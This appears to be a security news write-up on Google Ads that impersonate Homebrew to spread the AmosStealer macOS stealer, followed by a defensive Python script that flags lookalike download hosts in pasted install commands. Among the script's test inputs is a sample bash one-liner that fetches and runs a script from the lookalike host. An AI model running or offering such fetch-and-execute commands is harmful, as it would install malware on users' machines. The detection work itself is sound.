Cybersecurity researchers have uncovered a sophisticated malware campaign targeting macOS and Linux users through malicious Google Ads that impersonate the popular package manager Homebrew. The campaign deploys the dangerous AmosStealer malware, specifically designed to harvest cryptocurrency wallet credentials and sensitive financial data.
Campaign Discovery and Attack Vector Analysis
Security researcher Ryan Chenkie first identified this threat, which employs an advanced spoofing technique. The attackers create Google Ads whose display URL is the legitimate Homebrew address (brew.sh), but the click-through redirects victims to a nearly identical phishing domain, brewe[.]sh. This social engineering tactic has proven effective even against experienced users familiar with the legitimate Homebrew project, because the only visible difference is a single extra character in the domain.
Technical Analysis of AmosStealer Capabilities
AmosStealer, also known as Atomic, represents a new generation of information stealers specifically engineered for macOS environments. The malware operates under a Malware-as-a-Service (MaaS) model, with operators charging $1,000 monthly subscriptions for access to its infrastructure. Its primary functionality focuses on extracting sensitive data from more than 50 cryptocurrency extensions and wallets, including major platforms like Binance, Coinomi, Electrum, and Exodus.
Infection Chain and Distribution Mechanism
The attack sequence begins when users click on malicious Google Ads appearing in search results. Victims are directed to a convincing clone of the Homebrew website, where they’re prompted to execute a terminal command that appears identical to the legitimate Homebrew installation instruction. This command, however, initiates the download and installation of the AmosStealer malware instead of the intended package manager.
Security Industry Response and Mitigation
Homebrew project lead Mike McQuaid has acknowledged the ongoing campaign, while noting that the project has limited options for direct intervention, since the ads and the lookalike domain are outside its control. The incident has sparked criticism of Google’s ad verification processes, with security experts calling for more stringent controls on advertisement content validation.
To protect against this and similar threats, security experts recommend implementing multiple layers of verification when installing software. Users should manually type official URLs rather than clicking ads, verify digital signatures of downloaded packages, and maintain updated endpoint security solutions. The incident serves as a crucial reminder that even seemingly trustworthy sources like Google Ads can be weaponized for malware distribution, necessitating constant vigilance in today’s threat landscape.
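The infection chain above hinges on a pasted terminal command that looks like the real Homebrew installer but fetches its payload from a lookalike host, and the mitigation advice comes down to checking where a command actually downloads from before running it. The following is an added example, not code from the article or from the Homebrew project: a small Python pre-flight check that pulls every URL host out of a copy-pasted shell one-liner, compares it against an allowlist, and flags hosts that are within a couple of character edits of an allowlisted one (brewe.sh versus brew.sh) as lookalikes. The allowlist entries raw.githubusercontent.com and github.com are assumptions drawn from the public Homebrew install instructions, not from the article, which names only brew.sh and brewe[.]sh; the sample "fake" command is constructed for the test and is not the campaign's actual command.

```python
"""Defender-side pre-flight check for copy-pasted install commands (added example).

Extracts every http(s) URL host in a shell one-liner and classifies it against
an allowlist of hosts the legitimate Homebrew installer is expected to use.
Hosts within a small edit distance of an allowlisted host (e.g. brewe.sh vs
brew.sh) are reported as lookalikes so a user, or a shell wrapper, can refuse
to execute the command.
"""
import re
from urllib.parse import urlparse

# Hosts the legitimate Homebrew install instruction points at.  ASSUMPTION:
# taken from the public Homebrew install page, not from the article, which
# only names brew.sh and the lookalike brewe[.]sh.
ALLOWED_HOSTS = {"brew.sh", "raw.githubusercontent.com", "github.com"}

# Matches http(s) URLs up to whitespace or a shell/quote delimiter, so the
# URL inside  "$(curl -fsSL https://.../install.sh)"  is captured cleanly.
URL_RE = re.compile(r"https?://[^\s'\"()<>]+")


def extract_hosts(command: str) -> list[str]:
    """Return the lower-cased host of every http(s) URL found in a command string."""
    hosts = []
    for url in URL_RE.findall(command):
        host = urlparse(url).hostname
        if host:
            hosts.append(host.lower())
    return hosts


def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance, inlined to avoid pulling in a dependency."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def classify_host(host: str, allowed=ALLOWED_HOSTS, max_edits: int = 2) -> str:
    """'allowed' if host is (a subdomain of) an allowlisted host, 'lookalike' if
    it is within max_edits of one, otherwise 'unknown'."""
    for good in allowed:
        if host == good or host.endswith("." + good):
            return "allowed"
    for good in allowed:
        if edit_distance(host, good) <= max_edits:
            return "lookalike"
    return "unknown"


def check_install_command(command: str) -> dict:
    """Classify every host the command downloads from and give one overall verdict.

    Overall verdict: 'no-url' if the command fetches nothing, 'lookalike' if any
    host is a near-miss of an allowlisted one, 'allowed' only if every host is
    allowlisted, else 'unknown'.
    """
    verdicts = {h: classify_host(h) for h in extract_hosts(command)}
    if not verdicts:
        overall = "no-url"
    elif any(v == "lookalike" for v in verdicts.values()):
        overall = "lookalike"
    elif all(v == "allowed" for v in verdicts.values()):
        overall = "allowed"
    else:
        overall = "unknown"
    return {"hosts": verdicts, "verdict": overall}


# Constructed sample inputs.  LEGIT_INSTALL mirrors the public Homebrew install
# one-liner (assumption, not quoted from the article); FAKE_INSTALL is a
# made-up command that only reuses the lookalike host the article names.
LEGIT_INSTALL = (
    '/bin/bash -c "$(curl -fsSL '
    'https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"'
)
FAKE_INSTALL = '/bin/bash -c "$(curl -fsSL https://brewe.sh/install.sh)"'

if __name__ == "__main__":
    for cmd in (LEGIT_INSTALL, FAKE_INSTALL, "ls -la"):
        print(check_install_command(cmd)["verdict"], "<-", cmd)
```

The edit-distance threshold of 2 is deliberately small: it catches the single-character typosquat used here without flagging every unrelated domain, and the subdomain rule only accepts hosts that end in an allowlisted name, so something like brew.sh.example.test is not waved through.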